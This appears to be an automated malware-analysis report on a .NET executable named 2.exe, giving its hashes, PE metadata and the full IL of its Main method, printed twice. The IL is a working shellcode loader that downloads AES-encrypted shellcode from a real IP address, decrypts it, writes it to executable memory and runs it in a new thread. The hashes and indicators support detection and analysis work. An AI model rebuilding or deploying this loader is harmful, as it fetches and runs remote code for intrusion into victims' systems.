052e802974bb858a01fc9e9496c6a545
PE Executable | MD5: 052e802974bb858a01fc9e9496c6a545 | Size: 68.1 KB | application/x-dosexec
|
Hash | Hash Value |
|---|---|
| MD5 | 052e802974bb858a01fc9e9496c6a545
|
| Sha1 | ba6f5efd50ae6ff13976914e9c265b451c866a14
|
| Sha256 | 31b17fc404bab396ffaf4885cc7bcad47da641e5d6f420cbc6db68122c407d83
|
| Sha384 | bcf7fa2525e0d642874e73c033d1b26594d97194e8754eb1428ffbd6f1323ceaf8cacea33aa17ae135ddfa28b830525c
|
| Sha512 | 3c8cb20112b8dfb507b52c98ecd13b0344690b6bd719203cd3dd3004a46ee2dc37fa64610c77a69c8b63d728e6468d64222074d7417706167ed1daef6eb21aeb
|
| SSDeep | 768:kISI/cziFIo+++zwxw5s1liP1zumTUJZJ624JYNQFjIONiyktbiwXjJn5nwXJtgY:d+jL0iNDTyZ42Qp3NPkViwXFn5wXP
|
| TLSH | E2635A197FBF07ECEEF64531DC132831092B8D5A99B9821354937E1836B0E0B9A27E75
|
PeID
|
Name0 | Value |
|---|---|
| Module Name | 2.exe |
| Full Name | 2.exe |
| EntryPoint | System.Void AES_Shellcode_Tool.AES_Loader::Main() |
| Scope Name | 2.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | 2 |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 10 |
| Main Method | System.Void AES_Shellcode_Tool.AES_Loader::Main() |
| Main IL Instruction Count | 273 |
| Main IL | nop <null> ldstr http://202.95.1.68/ma/encrypted_shellcode.txt stloc.0 <null> ldstr [*] 从远程下载加密 shellcode... call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.0 <null> call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_12 ldloc.s V_12 ldstr GET callvirt System.Void System.Net.WebRequest::set_Method(System.String) nop <null> ldloc.s V_12 ldstr CustomAgent callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) nop <null> ldloc.s V_12 callvirt System.Net.WebResponse System.Net.WebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_13 ldloc.s V_13 callvirt System.IO.Stream System.Net.WebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_14 nop <null> ldloc.s V_14 callvirt System.String System.IO.TextReader::ReadToEnd() ldc.i4.2 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 13 stelem.i2 <null> dup <null> ldc.i4.1 <null> ldc.i4.s 10 stelem.i2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.Char[],System.StringSplitOptions) stloc.1 <null> nop <null> leave.s IL_0085: leave.s IL_0094 ldloc.s V_14 brfalse.s IL_0084: endfinally ldloc.s V_14 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_0094: nop ldloc.s V_13 brfalse.s IL_0093: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_00B6: ldnull stloc.s V_15 nop <null> ldstr [-] 下载失败: ldloc.s V_15 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_0274: ret ldnull <null> stloc.2 <null> ldnull <null> stloc.3 <null> ldnull <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_16 br.s IL_0129: ldloc.s V_16 nop <null> ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [AES_KEY_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_17 ldloc.s V_17 brfalse.s IL_00E3: ldloc.1 ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.2 <null> br.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [AES_IV_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0103: ldloc.1 ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.3 <null> br.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [ENCRYPTED_SHELLCODE_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_19 ldloc.s V_19 brfalse.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.s V_4 nop <null> ldloc.s V_16 ldc.i4.1 <null> add <null> stloc.s V_16 ldloc.s V_16 ldloc.1 <null> ldlen <null> conv.i4 <null> clt <null> stloc.s V_20 ldloc.s V_20 brtrue.s IL_00C2: nop ldloc.2 <null> brfalse.s IL_0143: ldc.i4.1 ldloc.3 <null> brfalse.s IL_0143: ldc.i4.1 ldloc.s V_4 ldnull <null> ceq <null> br.s IL_0144: stloc.s V_21 ldc.i4.1 <null> stloc.s V_21 ldloc.s V_21 brfalse.s IL_015B: ldloc.2 nop <null> ldstr [-] 数据解析失败 call System.Void System.Console::WriteLine(System.String) nop <null> br IL_0274: ret ldloc.2 <null> call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_5 ldloc.3 <null> call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_6 ldloc.s V_4 call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_7 call System.Security.Cryptography.Aes System.Security.Cryptography.Aes::Create() stloc.s V_22 nop <null> ldloc.s V_22 ldloc.s V_5 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Key(System.Byte[]) nop <null> ldloc.s V_22 ldloc.s V_6 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_IV(System.Byte[]) nop <null> ldloc.s V_22 ldc.i4.1 <null> callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Mode(System.Security.Cryptography.CipherMode) nop <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Padding(System.Security.Cryptography.PaddingMode) nop <null> ldloc.s V_7 newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc.s V_23 ldloc.s V_23 ldloc.s V_22 callvirt System.Security.Cryptography.ICryptoTransform System.Security.Cryptography.SymmetricAlgorithm::CreateDecryptor() ldc.i4.0 <null> newobj System.Void System.Security.Cryptography.CryptoStream::.ctor(System.IO.Stream,System.Security.Cryptography.ICryptoTransform,System.Security.Cryptography.CryptoStreamMode) stloc.s V_24 newobj System.Void System.IO.MemoryStream::.ctor() stloc.s V_25 nop <null> ldloc.s V_24 ldloc.s V_25 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) nop <null> ldloc.s V_25 callvirt System.Byte[] System.IO.MemoryStream::ToArray() stloc.s V_8 nop <null> leave.s IL_01E7: leave.s IL_01F6 ldloc.s V_25 brfalse.s IL_01E6: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_01F6: leave.s IL_0205 ldloc.s V_24 brfalse.s IL_01F5: endfinally ldloc.s V_24 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_0205: nop ldloc.s V_23 brfalse.s IL_0204: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_0215: ldstr "[+] 解密完成, shellcode 长度: {0}" ldloc.s V_22 brfalse.s IL_0214: endfinally ldloc.s V_22 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldstr [+] 解密完成, shellcode 长度: {0} ldloc.s V_8 ldlen <null> conv.i4 <null> box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_8 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.s 64 call System.IntPtr AES_Shellcode_Tool.AES_Loader::VirtualAlloc(System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_9 ldloc.s V_8 ldc.i4.0 <null> ldloc.s V_9 ldloc.s V_8 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_9 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_10 call System.IntPtr AES_Shellcode_Tool.AES_Loader::CreateThread(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_11 ldloc.s V_11 ldc.i4.m1 <null> call System.UInt32 AES_Shellcode_Tool.AES_Loader::WaitForSingleObject(System.IntPtr,System.UInt32) pop <null> ret <null> |
| Module Name | 2.exe |
| Full Name | 2.exe |
| EntryPoint | System.Void AES_Shellcode_Tool.AES_Loader::Main() |
| Scope Name | 2.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | 2 |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 10 |
| Main Method | System.Void AES_Shellcode_Tool.AES_Loader::Main() |
| Main IL Instruction Count | 273 |
| Main IL | nop <null> ldstr http://202.95.1.68/ma/encrypted_shellcode.txt stloc.0 <null> ldstr [*] 从远程下载加密 shellcode... call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.0 <null> call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_12 ldloc.s V_12 ldstr GET callvirt System.Void System.Net.WebRequest::set_Method(System.String) nop <null> ldloc.s V_12 ldstr CustomAgent callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) nop <null> ldloc.s V_12 callvirt System.Net.WebResponse System.Net.WebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_13 ldloc.s V_13 callvirt System.IO.Stream System.Net.WebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_14 nop <null> ldloc.s V_14 callvirt System.String System.IO.TextReader::ReadToEnd() ldc.i4.2 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 13 stelem.i2 <null> dup <null> ldc.i4.1 <null> ldc.i4.s 10 stelem.i2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.Char[],System.StringSplitOptions) stloc.1 <null> nop <null> leave.s IL_0085: leave.s IL_0094 ldloc.s V_14 brfalse.s IL_0084: endfinally ldloc.s V_14 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_0094: nop ldloc.s V_13 brfalse.s IL_0093: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_00B6: ldnull stloc.s V_15 nop <null> ldstr [-] 下载失败: ldloc.s V_15 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_0274: ret ldnull <null> stloc.2 <null> ldnull <null> stloc.3 <null> ldnull <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_16 br.s IL_0129: ldloc.s V_16 nop <null> ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [AES_KEY_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_17 ldloc.s V_17 brfalse.s IL_00E3: ldloc.1 ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.2 <null> br.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [AES_IV_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0103: ldloc.1 ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.3 <null> br.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [ENCRYPTED_SHELLCODE_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_19 ldloc.s V_19 brfalse.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.s V_4 nop <null> ldloc.s V_16 ldc.i4.1 <null> add <null> stloc.s V_16 ldloc.s V_16 ldloc.1 <null> ldlen <null> conv.i4 <null> clt <null> stloc.s V_20 ldloc.s V_20 brtrue.s IL_00C2: nop ldloc.2 <null> brfalse.s IL_0143: ldc.i4.1 ldloc.3 <null> brfalse.s IL_0143: ldc.i4.1 ldloc.s V_4 ldnull <null> ceq <null> br.s IL_0144: stloc.s V_21 ldc.i4.1 <null> stloc.s V_21 ldloc.s V_21 brfalse.s IL_015B: ldloc.2 nop <null> ldstr [-] 数据解析失败 call System.Void System.Console::WriteLine(System.String) nop <null> br IL_0274: ret ldloc.2 <null> call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_5 ldloc.3 <null> call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_6 ldloc.s V_4 call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_7 call System.Security.Cryptography.Aes System.Security.Cryptography.Aes::Create() stloc.s V_22 nop <null> ldloc.s V_22 ldloc.s V_5 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Key(System.Byte[]) nop <null> ldloc.s V_22 ldloc.s V_6 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_IV(System.Byte[]) nop <null> ldloc.s V_22 ldc.i4.1 <null> callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Mode(System.Security.Cryptography.CipherMode) nop <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Padding(System.Security.Cryptography.PaddingMode) nop <null> ldloc.s V_7 newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc.s V_23 ldloc.s V_23 ldloc.s V_22 callvirt System.Security.Cryptography.ICryptoTransform System.Security.Cryptography.SymmetricAlgorithm::CreateDecryptor() ldc.i4.0 <null> newobj System.Void System.Security.Cryptography.CryptoStream::.ctor(System.IO.Stream,System.Security.Cryptography.ICryptoTransform,System.Security.Cryptography.CryptoStreamMode) stloc.s V_24 newobj System.Void System.IO.MemoryStream::.ctor() stloc.s V_25 nop <null> ldloc.s V_24 ldloc.s V_25 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) nop <null> ldloc.s V_25 callvirt System.Byte[] System.IO.MemoryStream::ToArray() stloc.s V_8 nop <null> leave.s IL_01E7: leave.s IL_01F6 ldloc.s V_25 brfalse.s IL_01E6: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_01F6: leave.s IL_0205 ldloc.s V_24 brfalse.s IL_01F5: endfinally ldloc.s V_24 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_0205: nop ldloc.s V_23 brfalse.s IL_0204: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_0215: ldstr "[+] 解密完成, shellcode 长度: {0}" ldloc.s V_22 brfalse.s IL_0214: endfinally ldloc.s V_22 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldstr [+] 解密完成, shellcode 长度: {0} ldloc.s V_8 ldlen <null> conv.i4 <null> box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_8 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.s 64 call System.IntPtr AES_Shellcode_Tool.AES_Loader::VirtualAlloc(System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_9 ldloc.s V_8 ldc.i4.0 <null> ldloc.s V_9 ldloc.s V_8 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_9 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_10 call System.IntPtr AES_Shellcode_Tool.AES_Loader::CreateThread(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_11 ldloc.s V_11 ldc.i4.m1 <null> call System.UInt32 AES_Shellcode_Tool.AES_Loader::WaitForSingleObject(System.IntPtr,System.UInt32) pop <null> ret <null> |
|
Name0 | Value |
|---|---|
| Embedded Resources | 0 |
| Suspicious Type Names (1-2 chars) | 0 |
|
Name0 | Value | Location |
|---|---|---|
| Embedded Resources | 0 |
052e802974bb858a01fc9e9496c6a545 |
| Suspicious Type Names (1-2 chars) | 0 |
052e802974bb858a01fc9e9496c6a545 |